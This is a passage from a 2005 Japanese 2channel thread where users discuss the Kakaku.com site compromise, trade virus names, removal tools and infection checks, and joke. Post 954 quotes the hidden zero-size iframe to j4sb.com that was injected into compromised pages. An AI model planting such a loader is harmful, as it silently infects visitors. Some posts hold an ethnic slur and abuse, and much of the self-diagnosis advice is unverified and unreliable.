その戦いに敗れた業者の中にはかなり恨みを持っているものがいるかもね

中国人ハッカーとともに可能性として考えたほうがいいかもね


889 :名無しさん@5周年:2005/05/16(月) 16:41:19 ID:QON7Tnqs
>>884
Windowsシステムフォルダ内?

890 :マンゲのP太郎φ ★:2005/05/16(月) 16:41:43 ID:???
>現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050516/160876/

さてさて・・・

891 :870:2005/05/16(月) 16:42:46 ID:HwdbYKu/
>>879-880
じゃ僕はついてたということで

892 :名無しさん@5周年:2005/05/16(月) 16:44:38 ID:QBl1l8ax
なにがついてたん?

893 :名無しさん@5周年:2005/05/16(月) 16:44:45 ID:AAnXS2CS
>869
へぇ〜ドイツだと2割以上なのか。
ここまで差があるのは面白い。
世界ベースだとどれくらいになったのか気になるね。


ふと思ったんだけど、PSW.Delf.FZ はともかく
trojandownloader.small.AAO はどうなったんだろ。
こっちの報告は全然ないような?
メーカーごとにウィルスの名称が違うからよくわからんなぁ…

894 :名無しさん@5周年:2005/05/16(月) 16:44:55 ID:Y1uYQypx
>>889
C:\WINDOWS\Prefetchの中に2個
これ消していいのかなー

895 :名無しさん@5周年:2005/05/16(月) 16:45:17 ID:8R36m3W8
>>887
それはどこにあるの?
トレンドマイクロのHPみても見つからないんだけど

896 :名無しさん@5周年:2005/05/16(月) 16:45:39 ID:eDYUgkJ2
>>894
>>10はどうだったの?

897 :名無しさん@5周年:2005/05/16(月) 16:47:19 ID:ghmt3e0n
>>10をやって見つからなければおkじゃないのか?

>>894
explorerを消すわけにはいかんだろw
製作日が最近のやつならウイルスかも

898 :名無しさん@5周年:2005/05/16(月) 16:48:52 ID:eDYUgkJ2
>>895
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELF.RM

899 :名無しさん@5周年:2005/05/16(月) 16:49:30 ID:GKV4McyJ
こんな事に半日時間潰されてる事が腹立たしい・・
問題が解決しても価格.comへの憤りは消えないだろうね

900 :名無しさん@5周年:2005/05/16(月) 16:50:24 ID:ghmt3e0n
>>899
俺も
テスト期間だってのに

901 :名無しさん@5周年:2005/05/16(月) 16:50:58 ID:HM7gDnta
>>897
つーかC:\WINDOWS\Prefetchに古いファイルなんてないよ

902 :名無しさん@5周年:2005/05/16(月) 16:51:45 ID:vO4yP9R/
IE「Fox! 俺の獲物(ユーザー)に手を出すな!」

903 :名無しさん@5周年:2005/05/16(月) 16:51:48 ID:jRNuUTsa
内閣官房情報セキュリティセンター
ttp://www.bits.go.jp/

fuckjpmmの件通報しる

904 :あは:2005/05/16(月) 16:52:45 ID:eYpeupO3
社長が一人でシステム構築したbestgate使えばええやん
もしくは手動入力を基礎としたconecoでええやん(w

905 :名無しさん@5周年:2005/05/16(月) 16:52:55 ID:EX0hMOct
>>899
サンクリ合わせの同人原稿が遅れまくりの俺。

906 :名無しさん@5周年:2005/05/16(月) 16:54:11 ID:f/ogEh0Y
JR西日本は、運輸業界の革命児
カカクコムは、セキュリティ業界の革命児

907 :名無しさん@5周年:2005/05/16(月) 16:54:16 ID:Ef3l0CvS
>>902
スターフォックスかよ

908 :名無しさん@5周年:2005/05/16(月) 16:54:30 ID:Wy+qLBNo
紙に書けよw

909 :名無しさん@5周年:2005/05/16(月) 16:54:55 ID:9SYF6ch1
VIPPERてどのカテ?

910 :名無しさん@5周年:2005/05/16(月) 16:55:20 ID:pd+piaWx
>884を試してみた。>871と同じ結果だった。

しかし、C:\WINDOWS\Prefetchに今日更新されたEXPLORER.EXEがある。
どっちなんだー。

911 :名無しさん@5周年:2005/05/16(月) 16:55:24 ID:LisxHFxq
セキュリティ素人なのでよくわからんが、
そもそもこんな大穴塞いでないマイクロソフトの件
についてあんまり議論されてないのはなぜ?

価格コムに問題があるのは明白だが、
根本はWindowsの問題だろ?

閲覧しただけで、感染ってあんまりだ。。。orz..

912 :名無しさん@5周年:2005/05/16(月) 16:56:04 ID:Dh+TG1IF
>>909
http://ex10.2ch.net/news4vip/ ここ

wwwwwっうぇwっうぇwwwwwwwwっうぇ とか書いてる人達

913 :名無しさん@5周年:2005/05/16(月) 16:56:20 ID:QON7Tnqs
>>910
俺も
俺のprefetch内のexplorerは更新日時5月16日

914 :名無しさん@5周年:2005/05/16(月) 16:56:35 ID:wss2/muF
>>911
Windowsを選択した人間の問題。

文系死ね。

915 :名無しさん@5周年:2005/05/16(月) 16:56:54 ID:8vuQpaID
感染確認方法:
<Windowsシステムフォルダ>※内に "EXPLORER.EXE"、"HTDLL.DLL" というファイルを作成
"GAMEJTT1.TXT" という名称のファイルを作成
レジストリ値を改変

ってなってるけど、上記のファイル検索してもEXPLORER.EXE以外はないみたい。
これは感染してないとみていいんだよね?


916 :名無しさん@5周年:2005/05/16(月) 16:56:56 ID:vxVMLgDs
>あんまり議論されてない
されまくりで諦められてる

917 :名無しさん@5周年:2005/05/16(月) 16:57:03 ID:InQa159c
http://www.kakaku.com/
       ↑
  ブラクラリスト入り

918 :名無しさん@5周年:2005/05/16(月) 16:57:09 ID:eDYUgkJ2
>>911
現時点ではワームだかウイルスだかの挙動がまったくもって未確認だから
とりあえず不手際確定のkakaku.comが叩かれてるのかと

919 :名無しさん@5周年:2005/05/16(月) 16:57:24 ID:FxSiXtO7
ほぼ毎日閲覧、書き込みしていた。
WinXPsp2 パッチ最新
ブラウザはIEで設定はデフォルト
専用駆除ツールで調べてみたけど感染してなかったよ

感染のための条件を見極める必要アリだな


920 :名無しさん@5周年:2005/05/16(月) 16:57:25 ID:dNear3q0
よく分からんけどウィルスみつかったっていう人なんのソフトつかってるの?
おれはAVGだけど・・・

921 :名無しさん@5周年:2005/05/16(月) 16:57:39 ID:lxmNr0O+
trojandownloader.small.AAOの方はハケーンor駆除ツールまだっすか〜?

922 :名無しさん@5周年:2005/05/16(月) 16:58:59 ID:Opd3B8Vj
>>910
>WindowsXPはアプリケーシ
>ョンの起動速度を上げるため各アプリに関わるデータを『c:\Windows¥
>Prefetch』に保存しておきますが、このPrefetch ...

923 :名無しさん@5周年:2005/05/16(月) 16:59:10 ID:ZkVl7dB3
>>899
俺漏れも、必修の出席やばいっていうのにもう…

924 :名無しさん@5周年:2005/05/16(月) 16:59:21 ID:4VsAQQ5/
念心!

925 :名無しさん@5周年:2005/05/16(月) 17:00:03 ID:3jA5c5SB
雑談系2だよ

926 :名無しさん@5周年:2005/05/16(月) 17:00:06 ID:wss2/muF
文系死ね、文系死ね、文系死ね、

文系が居なきゃ、こんな事件起きてない。

文系死ね、文系死ね、文系死ね、

927 :名無しさん@5周年:2005/05/16(月) 17:00:16 ID:k6xKx4/u
アクセスしても繋がらなかったら無問題だよね?

928 :名無しさん@5周年:2005/05/16(月) 17:00:42 ID:QCd/QaeY
>>921
http://canon-sol.jp/product/nd/virusupd/

trojandownloader.small.AAOでページ内検索すると、昨年の11/30付で対応してる。
それで出なければ問題無い……ハズ。

929 :名無しさん@5周年:2005/05/16(月) 17:00:48 ID:CA5uECO9
藻前らPCの電源切って出かけなさい。
帰ってくるまで、あなたのPCはそのままです。
帰ってきた頃には有効な解決策が示されているはずです。


930 :名無しさん@5周年:2005/05/16(月) 17:03:21 ID:ne8lsVYp
このウイルスはシステム破壊型じゃないよね?
なら放置しておいても今日明日どうなるわけでもないと思うけど。

つか、ネットにつないだ時点でもう個人情報抜き取られただろうから、
ぶっちゃけもう手遅(ry

931 :921:2005/05/16(月) 17:03:35 ID:lxmNr0O+
>928 サンクス。NODが去年の11月に対応済みってことは、
普通に考えたら、他社のもほぼ同時期に対応してるはずだよねぇ。
ウイルスの名前が会社によって違うからわからないのかな?


932 :名無しさん@5周年:2005/05/16(月) 17:04:12 ID:QON7Tnqs
そんなに個人情報は入ってない
企業は平気なのだろうか

933 :名無しさん@5周年:2005/05/16(月) 17:04:27 ID:9wFHhOZZ
あれ?みんなFirefoxじゃないの?

934 :822:2005/05/16(月) 17:04:28 ID:EB/iycnr
>>842,862 どうもありがとう。

トレンドから駆除ツールが出たので、NOD32を入れるのではなく、これで確認することにします。

ありがとうございました。

935 :名無しさん@5周年:2005/05/16(月) 17:04:37 ID:gCKV/kOh
いやぁん!大丈夫かしらん




936 :名無しさん@5周年:2005/05/16(月) 17:04:46 ID:Ef3l0CvS
イケメンの会見まだですか?

937 :名無しさん@5周年:2005/05/16(月) 17:05:24 ID:f/ogEh0Y
今回の騒動を詠んで一句 その2

  カカクコム
  刺客にやられ
  マジへこむ

938 :名無しさん@5周年:2005/05/16(月) 17:05:56 ID:uGi6gVMV
んで結局、犯人は誰?

939 :名無しさん@5周年:2005/05/16(月) 17:07:30 ID:4VsAQQ5/
ヤス

940 :名無しさん@5周年:2005/05/16(月) 17:07:44 ID:f1KPzL6+
ヤスかチャンコロ

941 :名無しさん@5周年:2005/05/16(月) 17:08:16 ID:8R36m3W8
>>898
ありがと。
配給元すら信用できなくなってるよ(つД`)

942 :名無しさん@5周年:2005/05/16(月) 17:08:19 ID:pd+piaWx
>922
ということは、XPに元々あるものってことですか。


943 :名無しさん@5周年:2005/05/16(月) 17:08:53 ID:seZcifbg
なんにせよバスターが対応になってよかったよかった。


944 :名無しさん@5周年:2005/05/16(月) 17:08:56 ID:Dh+TG1IF

今回のまとめサイト

http://musyoku-waste.hp.infoseek.co.jp/test/index.htm



945 :名無しさん@5周年:2005/05/16(月) 17:09:03 ID:tUULPn1B
これ、本当にばら撒いたウイルスは2つだけですかねぇ?
価格コムのアナウンスが適当なんで状況がよくわからんし
まだ信用できないな。

946 :名無しさん@5周年:2005/05/16(月) 17:09:07 ID:VAQRnEL6
犯人は美樹本

947 :名無しさん@5周年:2005/05/16(月) 17:09:46 ID:dyPIlHLc
14日にたまたま見に行った漏れは負け組みorz

948 :名無しさん@5周年:2005/05/16(月) 17:10:01 ID:Ef3l0CvS
カカクコムの更新キター

949 :名無しさん@5周年:2005/05/16(月) 17:10:27 ID:hJSweNtq
>>818
つttp://bitdefender.gooside.com/index.htm

avgとbitdefender(只今スキャン中)で今のところ何も検出されないけど本当に大丈夫かな?心配…

950 :名無しさん@5周年:2005/05/16(月) 17:11:18 ID:sExTRMNY


ね ー ア マ ゾ ン も 落 ち て な い ?

951 :名無しさん@5周年:2005/05/16(月) 17:11:20 ID:eDYUgkJ2
>>948
トレンドマイクロが対応したってことだけかな?

952 :名無しさん@5周年:2005/05/16(月) 17:12:23 ID:Ef3l0CvS
美樹本といわれるとかまいたちの夜しか思い浮かばん

953 :名無しさん@5周年:2005/05/16(月) 17:12:39 ID:9Nhrj1gk
今回の騒動を詠んで一句

  カカクコム
  責任ないと
  逃げるコム

954 :名無しさん@5周年:2005/05/16(月) 17:13:24 ID:mn2Igb4D
ガイシュツ?
http://www.google.co.jp/search?hl=ja&q=j4sb&lr=

例の iframe と思われるものを含むページ

のびすく仙台
... <iframe src=http://www.j4sb.com/count/counter.ap?id=a02 width=0 height=0></iframe> 「
催し物情報」を6件追加しました (2005/4/14) のびすく仙台所在地 のびすく仙台利用法
託児の利用法 今月ののびすく仙台 みんなで作るのびすく仙台 催し物情報 ...

とか。

955 :名無しさん@5周年:2005/05/16(月) 17:13:41 ID:c7Pv0qsM
現時点で「カカクコムのWebサイトが原因でウイルスに感染したケース
はないと認識している」

またカカクコムは,対象となるウイルスを検知・削除できる対策ソフト(キヤノン
システムソリューションズの製品体験版)を,自社のサイトで16日から配布し始
めた。ただし,すでに他社のウイルス対策ソフトを導入しているユーザーはソフ
トウエアが競合する可能性があるため,このソフトは併用できない。「他社製品
のユーザーがどのように対処すれば良いのかは,各ウイルス対策ソフトのベンダ
ーと話し合っている最中。新しい種類のウイルスであるとの情報もある」(広報室)
。ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケース
はないと認識している」(同)という。
http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050516/160876/

956 :名無しさん@5周年:2005/05/16(月) 17:14:16 ID:a5CE2+kk
>>952
マクロスは

957 :名無しさん@5周年:2005/05/16(月) 17:14:41 ID:O2Wkg2i4
>>954
昨夜には出てましたね

958 :名無しさん@5周年:2005/05/16(月) 17:14:43 ID:0h3xHIMX
バスター駆除ツールやってみた
どうにかセーフだったみたい(汗)
まったく人騒がせだなカカクコムは・・・・

959 :名無しさん@5周年:2005/05/16(月) 17:15:14 ID:QBl1l8ax
>>950
落ちてねーよ。

960 :名無しさん@5周年:2005/05/16(月) 17:15:30 ID:9Nhrj1gk
カカクコムのWebサイトが原因でないのなら、この事件は起きなかったんじゃないの?
責任回避してるだけだよな

マジレス希望

961 :名無しさん@5周年:2005/05/16(月) 17:15:40 ID:s53gXUDR
>>954
ガイシュツ

つーか、わざとウイルス張るなw

962 :名無しさん@5周年:2005/05/16(月) 17:16:02 ID:FXilMV+K
公式では「当社サイトを閲覧されたお客様がウィルスファイルを取込んでしまった可能性があります。」

↓では
ttp://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050516/160876/
ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」

どっちなんだボケ

963 :名無しさん@5周年:2005/05/16(月) 17:17:22 ID:16s6b8eX
可能性はあるけど確認はできてないってことだろ

964 :名無しさん@5周年:2005/05/16(月) 17:17:23 ID:nls/rSCT
>>954
ttp://nobisuku-sendai.net/ で見たら

TEST PAGE KARAKURI START PAGE ってでたよ
対策中と思われます。

965 :名無しさん@5周年:2005/05/16(月) 17:17:48 ID:O2Wkg2i4
>>958
バスター駆除ツールはまだ駆除成功報告がないから気をつけろ
一応>>10とか確認した方がいいと思うぞ

966 :名無しさん@5周年:2005/05/16(月) 17:18:34 ID:Dh+TG1IF
2ちゃんのTOPに博之が埋め込んだ秘書日記のリンクのせいで
ユーザーがアクセスしたくもない秘書日記のランキングがあがっても
それは秘書さんのせいじゃありませんよ

ってことと同じかな?

967 :名無しさん@5周年:2005/05/16(月) 17:19:05 ID:8xtB+QKM
俺はウィルスが怖いからWindowsをアンスコしたぞ!HDDをアルコール漬けにしてみた。
俺は勝ち組だな。
携帯マンセー!

968 :名無しさん@5周年:2005/05/16(月) 17:19:24 ID:Z4GDGmdV
ウイルスなんて、気にしない、これ最強

969 :NAO:2005/05/16(月) 17:19:54 ID:SYqqoQaO
>>968
周りからどんな目で見られてるか、考えてみよう。

970 :名無しさん@5周年:2005/05/16(月) 17:20:19 ID:VCqRBmnR
>>967
GJ!

971 :名無しさん@5周年:2005/05/16(月) 17:20:43 ID:Ef3l0CvS
社長の会見まだー?

972 :名無しさん@5周年:2005/05/16(月) 17:20:48 ID:0QBEn/uD
13日にセットアップしたばかりなのに感染しとる

973 :名無しさん@5周年:2005/05/16(月) 17:21:35 ID:TDhUw0tY
ファイヤーフォックス入れちまった

974 :名無しさん@5周年:2005/05/16(月) 17:22:10 ID:QON7Tnqs
俺はどうやらインキンにやられたらしい

975 :名無しさん@5周年:2005/05/16(月) 17:22:33 ID:FOm0RxBw
あ、Antinny.Gってのに感染してた
怖いウイルスなのかなぁ?

976 :名無しさん@5周年:2005/05/16(月) 17:23:16 ID:gyhoJ9jr
記者会見は読売記者を最前列で。

977 :名無しさん@5周年:2005/05/16(月) 17:23:23 ID:VAQRnEL6
>>975
クマー

978 :名無しさん@5周年:2005/05/16(月) 17:23:36 ID:5DzMGf/I
>>926
文系にこき使われているのがそんなに悔しいのか?

979 :名無しさん@5周年:2005/05/16(月) 17:23:41 ID:65B7WSez
おぅ、感染してた・・・

980 :名無しさん@5周年:2005/05/16(月) 17:23:49 ID:oudIof05
avast!で調べたけどいっこもなかった

981 :名無しさん@5周年:2005/05/16(月) 17:23:57 ID:f/ogEh0Y
今回の騒動を詠んで一句

カカクコム
価格重視も
限度過ぎ

982 :名無しさん@5周年:2005/05/16(月) 17:23:58 ID:LGea/kyS
xpsp2・Lunascape2使用で感染しました。
Firefoxの人も検査したほうがいいです。

983 :名無しさん@5周年:2005/05/16(月) 17:24:09 ID:tM63GLwD
>>980
avast対応してないんじゃね?

984 :名無しさん@5周年:2005/05/16(月) 17:24:15 ID:dyPIlHLc
Bitで駆除。んで、トレンドのやつで検知されなかった

985 :名無しさん@5周年:2005/05/16(月) 17:24:26 ID:73qNy5RP
パソコンは無事だったがもっと嫌なものに感染してた・・・・・










おまいら、コンドームはしておけよ!

986 :名無しさん@5周年:2005/05/16(月) 17:24:54 ID:+OLhN2lO
NOD32とBitDefender入れたくない人はこれでOK
RegSeeker 1.45
ttp://www.hoverdesk.net/freeware.htm

987 :名無しさん@5周年:2005/05/16(月) 17:24:54 ID:gyhoJ9jr
>>981
勉強しすぎて公取にがつんとやられたサカイを思い出すな

988 :名無しさん@5周年:2005/05/16(月) 17:25:32 ID:nCCqm6xH
>>967
エタノールでも大丈夫?

989 :名無しさん@5周年:2005/05/16(月) 17:26:10 ID:PGKaZvuX
トレンドの駆除ツール落として実行したけど一瞬コマンドプロンプトの画面が出るだけで終了しちゃう・・_| ̄|○

990 :名無しさん@5周年:2005/05/16(月) 17:26:14 ID:UsuvKokF
>>967
ワロタ

991 :名無しさん@5周年:2005/05/16(月) 17:26:23 ID:bwxwt6yt
>>988
エタノールもアルコールやん


992 :名無しさん@5周年:2005/05/16(月) 17:26:46 ID:htiPbfd9
記者会見マダー?(・∀・ )っ/凵 ⌒☆チン 

993 :名無しさん@5周年:2005/05/16(月) 17:27:00 ID:QON7Tnqs
outpostのキャッシュに
2005/05/16 17:25:05---キャッシュできませんウチのアド
2005/05/16 17:25:05---キャッシュできませんウチのアド
2005/05/16 17:25:05---キャッシュできませんウチのアド

が度々でるようになった
なんでや?

994 :名無しさん@5周年:2005/05/16(月) 17:27:23 ID:tUULPn1B
全部中国サーバにある

995 :名無しさん@5周年:2005/05/16(月) 17:27:28 ID:O2Wkg2i4
>>989
デスクトップのfix_delfRMってフォルダができててその中にログがあるはず

996 :名無しさん@5周年:2005/05/16(月) 17:27:33 ID:GeTcFKaX
>>989
もれもれも。なんで?

997 :名無しさん@5周年:2005/05/16(月) 17:27:41 ID:gOBMrbDo
1000キター

998 :名無しさん@5周年:2005/05/16(月) 17:27:55 ID:aqN8CNfN
1000

999 :名無しさん@5周年:2005/05/16(月) 17:28:02 ID:5AI+Kcef
1000

1000 :名無しさん@5周年:2005/05/16(月) 17:28:02 ID:LQx0P390
1000なら感染してない

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

222 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)